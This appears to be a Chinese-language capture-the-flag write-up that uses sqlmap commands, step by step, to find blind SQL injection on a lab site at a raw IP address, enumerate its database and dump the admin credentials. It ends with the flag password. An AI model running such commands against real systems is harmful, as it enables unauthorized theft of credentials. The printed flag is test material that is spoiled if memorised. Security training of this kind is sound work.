题目:获取数据库管理员密码
题目传送阵
渗透步骤
第一步:点击“点击查看新闻”超链接,跳转到一个页面,url发生改变,设想这个页面存在sql漏洞。
第二步:输入sqlmap.py -u "http://59.63.200.79:8003/?id=1" --batch
,使用sqlmap对该页面进行扫描,看该页面是否存在漏洞,从结果得知可以从基于布尔以及时间的盲注进行攻击。
第三步:输入sqlmap.py -u "http://59.63.200.79:8003/?id=1" --batch --dbs
查看数据库,发现maoshe数据库,结合页面,猜测需要获取的密码存在于这个数据库里面.
第四步:输入sqlmap.py -u "http://59.63.200.79:8003/?id=1" --batch -D maoshe --tables
查看maoshe数据库里面的表,发现admin这个表。
第五步:输入sqlmap.py -u "http://59.63.200.79:8003/?id=1" --batch -D maoshe -T admin --columns
查看admin里面的内容,发现用户名以及密码。
第六步:输入sqlmap.py -u "http://59.63.200.79:8003/?id=1" --batch -D maoshe -T admin -C "username,password" --dump
查看用户名以及密码,之后提交密码“hellohack”即可。